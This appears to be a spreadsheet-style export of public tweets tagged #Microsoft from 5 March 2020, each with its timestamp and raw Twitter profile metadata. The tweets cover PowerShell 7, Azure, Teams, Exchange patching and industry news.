    <t>{'id': 3244504141, 'id_str': '3244504141', 'name': 'Archonsec', 'screen_name': 'archonsec', 'location': 'archonsec.com', 'description': 'Microsoft Silver Partner, #Cloud, #PCI, #HIPAA, #SecurityasaService, #BigData, #Azure, #BCDR, #IoT, #Office365, #Compliance, #AI, #ML. Contact us ðŸ‘‡', 'url': 'https://t.co/NEik9mZgbo', 'entities': {'url': {'urls': [{'url': 'https://t.co/NEik9mZgbo', 'expanded_url': 'https://www.archonsec.com', 'display_url': 'archonsec.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8846, 'friends_count': 3928, 'listed_count': 98, 'created_at': 'Sat Jun 13 18:38:48 +0000 2015', 'favourites_count': 83625, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 65005,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'http://pbs.twimg.com/profile_images/1095456152517857280/Go0eHhpu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095456152517857280/Go0eHhpu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3244504141/1550012089',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</si>
  <si>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22:01:02 +0000 2020</t>
  </si>
  <si>
    <t>.NET Conf: Focus on Xamarin Live Stream https://t.co/6lCP3fUoRY #microsoft #feedly</t>
  </si>
  <si>
    <t>{'id': 6167462, 'id_str': '6167462', 'name': 'Tadahiro Ishisaka', 'screen_name': 'ishisaka', 'location': 'é™å²¡çœŒ', 'description': 'Xbox Gamer tag: Ishisaka', 'url': 'http://t.co/iYPXTNPUlk', 'entities': {'url': {'urls': [{'url': 'http://t.co/iYPXTNPUlk', 'expanded_url': 'http://opcdiary.net/', 'display_url': 'opcdiary.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1759, 'friends_count': 1498, 'listed_count': 130, 'created_at': 'Sat May 19 22:14:25 +0000 2007', 'favourites_count': 11882, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 115835,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'http://pbs.twimg.com/profile_images/793221841653411840/gOettUfk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793221841653411840/gOettUfk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6167462/1398257683', 'profile_link_color': '0042B3',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</si>
  <si>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22:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Make your battery last longer https://t.co/bgbKqpEoRe? #microsoft #batterylife #windows10 #pctips</t>
  </si>
  <si>
    <t>{'id': 916974354, 'id_str': '916974354', 'name': 'AHS Computing Office', 'screen_name': 'uw_ahsco', 'location': 'University of Waterloo', 'description': 'We are committed to providing Information Technology (IT) support to faculty, staff, and students in Applied Health Sciences at the University of Waterloo.', 'url': 'https://t.co/nB6J8hmRgD', 'entities': {'url': {'urls': [{'url': 'https://t.co/nB6J8hmRgD', 'expanded_url': 'https://uwaterloo.ca/applied-health-sciences-computing/', 'display_url': 'uwaterloo.ca/applied-healthâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 493, 'listed_count': 5, 'created_at': 'Wed Oct 31 14:20:53 +0000 2012', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 869,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'http://pbs.twimg.com/profile_images/2789109746/92f621dc7ed3784eefad54139eb3700c_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2789109746/92f621dc7ed3784eefad54139eb3700c_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/916974354/1540223935',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</si>
  <si>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22:00:22 +0000 2020</t>
  </si>
  <si>
    <t>Visual Studio Code for PowerShell 7 https://t.co/TP8KBUq6ha #microsoft #feedly</t>
  </si>
  <si>
    <t>Thu Mar 05 22:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Check out this great indepth article on Business Continuity by Microsofts @darrylr and @MarkLitwin #microsoft #cloud #business #technology #microsoft365 #microsoftteams https://t.co/MyoKoshuCW</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</si>
  <si>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33069, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 62425,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</si>
  <si>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Mar 05 22:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Check it. #Microsoft, EY and ConsenSys Tout New Way for Big Biz to Use Public Ethereum https://t.co/l9ZOKGmszK via @coindesk #tech #digital #data #business</t>
  </si>
  <si>
    <t>{'id': 135922295, 'id_str': '135922295', 'name': 'Kohei Kurihara   Blockchain CMO', 'screen_name': 'kuriharan', 'location': 'Tokyo-to, Japan', 'description': '@gbaglobal President of Tokyo Chapter, CollaboGate CMO. Privacy design and SDGs, Blockchain. Next-gen data driven marketer. Letâ€™s make collaboration!', 'url': 'https://t.co/r7lP3ReEuX', 'entities': {'url': {'urls': [{'url': 'https://t.co/r7lP3ReEuX', 'expanded_url': 'https://jp.linkedin.com/in/kuriharan', 'display_url': 'jp.linkedin.com/in/kuriharan', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46877, 'friends_count': 37291, 'listed_count': 2503, 'created_at': 'Thu Apr 22 15:09:22 +0000 2010', 'favourites_count': 44142, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 233486,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'http://pbs.twimg.com/profile_images/1062357613289979909/NLvrLDsv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1062357613289979909/NLvrLDsv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/135922295/1563073340', 'profile_link_color': '040470', 'profile_sidebar_border_color': '0E285C', 'profile_sidebar_fill_color': '8CC4DE', 'profile_text_color': '153C8A', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:58:30 +0000 2020</t>
  </si>
  <si>
    <t>They say #proof is in the pudding, so we as #MicrosoftPartner have placed our #Microsoft #pricing for all to see at https://t.co/9qMGf3OLr6 . Call (888)511-0143 . #ItGurusOfAtlanta #CloudTechnology #CloudSolutions #Office365 #Azure #InTune #EnterpriseMobilitySuite #ItGurusAtl</t>
  </si>
  <si>
    <t>Thu Mar 05 21:57:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft beats #Apple ;) If Youd Invested $1,000 https://t.co/Mt9uWEHzb5 https://t.co/YvhCA42cMu</t>
  </si>
  <si>
    <t>{'id': 101400972, 'id_str': '101400972', 'name': 'lepinekong ðŸ§¢ #andrewyang ðŸ§˜\u200dâ™€ï¸#realhumanhere', 'screen_name': 'lepinekong', 'location': 'Paris, France / Cambodia', 'description': "I'm building #tools for #Training and #Learning #Organizations willing to truly achieve #Agility. #Agile Coach/PO/BA Knew #Deming friend. ExFounder in 1995-2000", 'url': 'https://t.co/8UhnkAnyQq', 'entities': {'url': {'urls': [{'url': 'https://t.co/8UhnkAnyQq', 'expanded_url': 'https://grafcet.online', 'display_url': 'grafcet.online', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1901, 'friends_count': 1458, 'listed_count': 825, 'created_at': 'Sun Jan 03 05:00:33 +0000 2010', 'favourites_count': 6397, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 49127,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'http://pbs.twimg.com/profile_images/1146824763240828929/XSYccWkq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146824763240828929/XSYccWkq_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/101400972/1562259160', 'profile_link_color': '26C304', 'profile_sidebar_border_color': '7E704D', 'profile_sidebar_fill_color': 'E8FFD1', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:55:55 +0000 2020</t>
  </si>
  <si>
    <t>Do you really want to gamble on your accounting system? https://t.co/rQhoUQZ4Q7 by @vsilvani
#SharkTank #Entrepreneurs #TechBiz #BusinessGrowth #CFO #CEOs #RevRec #SubscriptionBilling #BillingSoftware #BusinessSolutions #CRM #ERP #BetterTogether #Microsoft #PowerApp #DynGP</t>
  </si>
  <si>
    <t>{'id': 862725287347441668, 'id_str': '862725287347441668', 'name': 'M. Jason Magboo', 'screen_name': 'jason_magboo', 'location': 'Fullerton, CA', 'description': 'Marketing Consultant @GoGravityOnline robust #cloudaccounting software built on #MicrosoftDynamics365 platform.', 'url': 'https://t.co/rK8dArTTfz', 'entities': {'url': {'urls': [{'url': 'https://t.co/rK8dArTTfz', 'expanded_url': 'http://go-gravity.com', 'display_url': 'go-gravity.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 203, 'friends_count': 289, 'listed_count': 9, 'created_at': 'Thu May 11 17:45:11 +0000 2017', 'favourites_count': 15, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3158,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'http://pbs.twimg.com/profile_images/862729990194049024/Wliu-4SR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/862729990194049024/Wliu-4SR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/862725287347441668/1494528052',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</si>
  <si>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21:55:10 +0000 2020</t>
  </si>
  <si>
    <t>Business Continuity - Making the Most of Your Existing Microsoft Cloud Productivity Investments #microsoft #cloud #business #technology #microsoft365 #microsoftteams  https://t.co/yejdSPbJjW</t>
  </si>
  <si>
    <t>Thu Mar 05 21:52:32 +0000 2020</t>
  </si>
  <si>
    <t>Visual Studio Code for PowerShell 7 https://t.co/m9HgLf29lp #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 21:52:06 +0000 2020</t>
  </si>
  <si>
    <t>Just read someone say there's "NO WAY" you can change the #StartMenu button in #Windows 10 &amp;amp; so I logged out of Linux &amp;amp; booted Win &amp;amp; took this screenshot. I actually make buttons &amp;amp; have some one on DeviantArt.
#Microsoft 
#theme https://t.co/vS3v0zEuQA</t>
  </si>
  <si>
    <t>{'id': 20113290, 'id_str': '20113290', 'name': 'à¼º ð•‹ð•™ð•– ð”½ð•ð•¦ð•© ð”¸ð•¡ð•–ð•© à¼»', 'screen_name': 'TheFluxApex', 'location': 'Decatur, IL.  The Dirty Dtown', 'description': 'ðŸŒŸ Avid Learner \nðŸŒŸ Proud Daddy \nðŸŒŸ #StayAtHomeDad\nðŸŒŸ #Coder\nðŸŒŸ Graphic Designer\nðŸŒŸ #Autohotkey/#Python Advocate\nðŸŒŸ &amp; More\nI love both #Windows &amp; #Linux ðŸ–¥ ðŸ‡ºðŸ‡¸', 'url': 'https://t.co/irxiuSFUAy', 'entities': {'url': {'urls': [{'url': 'https://t.co/irxiuSFUAy', 'expanded_url': 'https://lateralus138.github.io', 'display_url': 'lateralus138.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 222, 'listed_count': 0, 'created_at': 'Thu Feb 05 01:44:52 +0000 2009', 'favourites_count': 1161, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1516, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3F26E3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230561804863959041/cY-7amfF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230561804863959041/cY-7amfF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20113290/1582223691', 'profile_link_color': 'FF2222', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '399A09', 'profile_text_color': '492222', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:51:42 +0000 2020</t>
  </si>
  <si>
    <t>Last year I worked on a cloud migration (IaaS to PaaS).  This is a brief overview how Azure App Services were secured - implemented alongside Barracuda CloudGen WAF.
This one might spawn a few more articles.
#microsoft #azure #paas #appservices
https://t.co/w5IeGzUG9V</t>
  </si>
  <si>
    <t>{'id': 1233534613097762822, 'id_str': '1233534613097762822', 'name': 'Mark Patton', 'screen_name': 'Mark_D_Patton', 'location': '', 'description': 'Technical Architect @kainosoftware\nMicrosoft Certified Solutions Architect Expert\n#Azure #AZOps #AzureFamily', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 89, 'listed_count': 0, 'created_at': 'Fri Feb 28 23:29:15 +0000 2020', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1233541315813617666/q3wGj9lD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233541315813617666/q3wGj9lD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233534613097762822/1582934606',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</si>
  <si>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21:51:39 +0000 2020</t>
  </si>
  <si>
    <t>Why #Exchange admins should be very worried!
If you havent already done so, this week you should be applying patches to your Exchange Servers.
https://t.co/qwudOGuYkM
#avinext #microsoft #patch https://t.co/vZ6Y7uILx2</t>
  </si>
  <si>
    <t>{'id': 866710711099174913, 'id_str': '866710711099174913', 'name': 'Avinext', 'screen_name': 'Avinext', 'location': 'College Station, TX', 'description': 'Av Savvy. Network Smart. - Check out our website to see what type of services and solutions we can offer your companyâ¤µï¸', 'url': 'https://t.co/AgHTxrCinN', 'entities': {'url': {'urls': [{'url': 'https://t.co/AgHTxrCinN', 'expanded_url': 'http://www.Avinext.com', 'display_url': 'Avinext.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 11, 'listed_count': 1, 'created_at': 'Mon May 22 17:41:51 +0000 2017', 'favourites_count': 171, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 762,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'http://pbs.twimg.com/profile_images/1211160516875472902/um55E5Sh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211160516875472902/um55E5Sh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/866710711099174913/1495488206',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</si>
  <si>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21:51:06 +0000 2020</t>
  </si>
  <si>
    <t>ConsenSys, Microsoft, EY bet businesses will embrace public blockchains
EY, Microsoft, and ConsenSys believe that given st...
#blockchain #consensys #microsoft #public
https://t.co/gB1ekn7RGA</t>
  </si>
  <si>
    <t>Thu Mar 05 21:47:37 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft Shares Tactics Used in Human-Operated Ransomware Attacks:" https://t.co/LBLi1Hxf6V
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Mar 05 21:46:16 +0000 2020</t>
  </si>
  <si>
    <t>Tech companies are getting more aggressive to fight COVID-19 hoaxes https://t.co/EfrxvhvAEI #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 21:44:59 +0000 2020</t>
  </si>
  <si>
    <t>Dynamics 365 Finance Insights, a set of AI-powered capabilities is coming to Dynamics 365 Finance, which will transform the finance function. 
Learn more: https://t.co/LPo6bogUsg
#AXSource #Microsoft #Dynamics365 #msdyn365fin #msdyn365fo</t>
  </si>
  <si>
    <t>{'id': 464737208, 'id_str': '464737208', 'name': 'AXSource', 'screen_name': 'axsource', 'location': 'CAN, USA, IND, &amp; SGP', 'description': 'IT &amp; Regulatory/Quality Consulting, a partner of #MSDyn365 ||\n \nhttps://t.co/kxE1rlyO5u\nhttps://t.co/R0QCOaRGGJ\nhttps://t.co/Kbr5Qk0OIq\nhttps://t.co/DBKnlNVsS9', 'url': 'https://t.co/fysdox0ks5', 'entities': {'url': {'urls': [{'url': 'https://t.co/fysdox0ks5', 'expanded_url': 'http://AXSource.com', 'display_url': 'AXSource.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/kxE1rlyO5u', 'expanded_url': 'http://D365QCS.com', 'display_url': 'D365QCS.com', 'indices': [64, 87]}, {'url': 'https://t.co/R0QCOaRGGJ', 'expanded_url': 'http://D365OCS.com', 'display_url': 'D365OCS.com', 'indices': [88, 111]}, {'url': 'https://t.co/Kbr5Qk0OIq', 'expanded_url': 'http://D365HPOS.com', 'display_url': 'D365HPOS.com', 'indices': [112, 135]}, {'url': 'https://t.co/DBKnlNVsS9', 'expanded_url': 'http://Restasol.com', 'display_url': 'Restasol.com', 'indices': [136, 159]}]}}, 'protected': False, 'followers_count': 582, 'friends_count': 623, 'listed_count': 159, 'created_at': 'Sun Jan 15 15:34:12 +0000 2012', 'favourites_count': 684, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3430,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/862333539890679808/1VSuYh4T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/862333539890679808/1VSuYh4T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/464737208/1549647012', 'profile_link_color': '002E5D', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:43:03 +0000 2020</t>
  </si>
  <si>
    <t>#PowerShell 7 has reached the "general availability" (GA) stage, #Microsoft announced this week, after being in the "release candidate" stage since December. https://t.co/F93aS4KOyA</t>
  </si>
  <si>
    <t>{'id': 30307787, 'id_str': '30307787', 'name': 'MCPmag.com', 'screen_name': 'MCPmag', 'location': 'The Internet', 'description': 'Microsoft Certified Professional Magazine Online: Managing the Windows Network', 'url': 'http://t.co/G9bVah1dvP', 'entities': {'url': {'urls': [{'url': 'http://t.co/G9bVah1dvP', 'expanded_url': 'http://mcpmag.com', 'display_url': 'mcpmag.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2262, 'friends_count': 197, 'listed_count': 143, 'created_at': 'Fri Apr 10 20:42:07 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4226, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '011C37', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/513026666784780289/nodzG_oZ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/513026666784780289/nodzG_oZ_normal.png', 'profile_link_color': '999999', 'profile_sidebar_border_color': 'FF6600', 'profile_sidebar_fill_color': '999999', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:42:32 +0000 2020</t>
  </si>
  <si>
    <t>Numeric calculations in Data Analysis Expressions with Power BI | Community Webinars https://t.co/UkWhuNnn75 via @youtube #Microsoft #PowerBI</t>
  </si>
  <si>
    <t>{'id': 835206756078862336, 'id_str': '835206756078862336', 'name': 'BI4U', 'screen_name': 'BI4U_ES', 'location': 'Madrid, Global', 'description': 'Consulting firm on Power BI end-to-end-solutions to Companies worldwide: Development, Deployment and Support #Microsoft #BI #Analytics #PowerBI #DAX #M #Azure', 'url': 'https://t.co/XMcaSlBOXt', 'entities': {'url': {'urls': [{'url': 'https://t.co/XMcaSlBOXt', 'expanded_url': 'http://www.bi4u.es', 'display_url': 'bi4u.es', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 338, 'friends_count': 290, 'listed_count': 7, 'created_at': 'Fri Feb 24 19:16:22 +0000 2017', 'favourites_count': 1521, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3795,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'http://pbs.twimg.com/profile_images/980390934633476096/9qPBoo6Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/980390934633476096/9qPBoo6Y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/835206756078862336/1576196774', 'profile_link_color': '5170AD',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</si>
  <si>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21:41:58 +0000 2020</t>
  </si>
  <si>
    <t>Our #Microsoft commitment to customers during #COVID-19. Making #Teams available for everyone. Stay well. Read more here below. https://t.co/LkSWiBKM2z</t>
  </si>
  <si>
    <t>{'id': 751166786133950465, 'id_str': '751166786133950465', 'name': 'Christiaan Brinkhoff', 'screen_name': 'Brinkhoff_C', 'location': 'Made in Holland', 'description': 'Global Black Belt, WVD at Microsoft, Former MVP, Citrix CTP, VMware vExpert, Public Speaker, Author, Blogger, and @ProByteSized &amp; @VDILIKEAPRO. Tweets are mine.', 'url': 'https://t.co/zuB4nW6jEn', 'entities': {'url': {'urls': [{'url': 'https://t.co/zuB4nW6jEn', 'expanded_url': 'http://christiaanbrinkhoff.com', 'display_url': 'christiaanbrinkhoff.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4230, 'friends_count': 2634, 'listed_count': 62, 'created_at': 'Thu Jul 07 21:31:32 +0000 2016', 'favourites_count': 5010, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2845,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'http://pbs.twimg.com/profile_images/1035218668144287744/NLcEGNp5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1035218668144287744/NLcEGNp5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/751166786133950465/1583429161', 'profile_link_color': '05A9E8',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</si>
  <si>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21:41:42 +0000 2020</t>
  </si>
  <si>
    <t>@Oracle is upping its game in the race against #Microsoft and #Amazon for #cloud computing market share. @Reuters #cdwsocial https://t.co/FbY7zUvKOF</t>
  </si>
  <si>
    <t>{'id': 828774937640841216, 'id_str': '828774937640841216', 'name': 'WA State &amp; Local', 'screen_name': 'CDWGWAGov', 'location': 'Bellevue, WA', 'description': "Working closely with WA State &amp; Local Gov't stakeholders, focusing on new technology solutions and initiatives, driving positive changes in their environment.", 'url': 'https://t.co/LZXT3JGo0m', 'entities': {'url': {'urls': [{'url': 'https://t.co/LZXT3JGo0m', 'expanded_url': 'http://www.cdwg.com', 'display_url': 'cdwg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7203, 'friends_count': 7425, 'listed_count': 124, 'created_at': 'Tue Feb 07 01:18:37 +0000 2017', 'favourites_count': 58355, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 83189, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/982851565475082241/sV75X7aU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/982851565475082241/sV75X7aU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/828774937640841216/1542481113',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</si>
  <si>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21:41:30 +0000 2020</t>
  </si>
  <si>
    <t>A new #Azure feature called Backup Reports is now available as a public preview, #Microsoft announced. https://t.co/Tb7dxPufYD</t>
  </si>
  <si>
    <t>{'id': 33313408, 'id_str': '33313408', 'name': 'Redmond Channel', 'screen_name': 'RedmondPartner', 'location': 'Online and in Print', 'description': 'Official Twitter account for Redmond Channel Partner magazine. News, sales tips, MPN guidance &amp; more for solution providers, VARs, ISVs.', 'url': 'http://t.co/jHfHYRVmHu', 'entities': {'url': {'urls': [{'url': 'http://t.co/jHfHYRVmHu', 'expanded_url': 'http://rcpmag.com', 'display_url': 'rcpmag.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2243, 'friends_count': 929, 'listed_count': 119, 'created_at': 'Sun Apr 19 21:11:04 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6818, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '333333', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1925172993/Twitter_logo_rcp2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1925172993/Twitter_logo_rcp2_normal.jpg', 'profile_link_color': '336699', 'profile_sidebar_border_color': 'CC4D00', 'profile_sidebar_fill_color': 'EEEEEE', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:41:19 +0000 2020</t>
  </si>
  <si>
    <t>Madison Logic Joins the LinkedIn Marketing Partner Program to Amplify Global, Multi-Channel ABM @martechcube #martech #adtech #madisonlogic #microsoft #linkedin #bigtech #technews #tech #marketers #marketing #socialmediamarketing #socialmedia #digital
https://t.co/8CWrvh0EXr</t>
  </si>
  <si>
    <t>{'id': 1047491332837654528, 'id_str': '1047491332837654528', 'name': 'The MarTech Hub', 'screen_name': 'MarTechHub', 'location': 'Boston, MA', 'description': 'The latest in #MarTech #AdTech #MarketingStrategy #DigitalMarketing #TechNews for #Marketers\n\nMarTechHub@gmail.com', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 371, 'friends_count': 170, 'listed_count': 6, 'created_at': 'Wed Oct 03 14:19:29 +0000 2018', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1086,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'http://pbs.twimg.com/profile_images/1072938548737695744/U_WRGH7u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1072938548737695744/U_WRGH7u_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1047491332837654528/1538663845',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</si>
  <si>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21:40:43 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT finds buyers again around 165.69: https://t.co/rNOLVYbURz
Sentiment: Neutral #MSFT #Microsoft</t>
  </si>
  <si>
    <t>{'id': 931115585790009346, 'id_str': '931115585790009346', 'name': 'TQ Equities', 'screen_name': 'tq_equities', 'location': 'Berlin, Deutschland', 'description': 'Quantified Equities Market Reports Daily https://t.co/0gG2UzWvH6  Legal Notice: https://t.co/SbdXvYNWJb', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/0gG2UzWvH6', 'expanded_url': 'https://techniquant.com/reports', 'display_url': 'techniquant.com/reports', 'indices': [41, 64]}, {'url': 'https://t.co/SbdXvYNWJb', 'expanded_url': 'https://techniquant.com/legal/legal-notice/', 'display_url': 'techniquant.com/legal/legal-noâ€¦', 'indices': [80, 103]}]}}, 'protected': False, 'followers_count': 442, 'friends_count': 6, 'listed_count': 8, 'created_at': 'Thu Nov 16 11:03:49 +0000 2017', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 36584, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/931121418967937024/OILlb02u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/931121418967937024/OILlb02u_normal.jpg',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</si>
  <si>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21:38:42 +0000 2020</t>
  </si>
  <si>
    <t>it didn't really improve that much, but hey, it's neat either way 
#art #pixelart #fanart #ori #microsoft #indie https://t.co/yAKCOF2Utd</t>
  </si>
  <si>
    <t>{'id': 840358637218516993, 'id_str': '840358637218516993', 'name': 'Waterâ™¥| PixelArtist', 'screen_name': 'WaterPixelArt', 'location': 'Somewhere in Argentina (South America)', 'description': "i'm a PixelArtist girl â™€ï¸!  love all kinds of PixelArt. DMs are always open. I'm free to help anyone who's in need @PixelBunny821's favorite Thingie", 'url': 'https://t.co/pmfHRzStNS', 'entities': {'url': {'urls': [{'url': 'https://t.co/pmfHRzStNS', 'expanded_url': 'https://www.deviantart.com/waterpixelart?rnrd=262068', 'display_url': 'deviantart.com/waterpixelart?â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 747, 'friends_count': 210, 'listed_count': 6, 'created_at': 'Sat Mar 11 00:28:07 +0000 2017', 'favourites_count': 8036, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1461,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'http://pbs.twimg.com/profile_images/1178756891742261249/g_RCkLR2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178756891742261249/g_RCkLR2_normal.jpg', 'profile_banner_url': 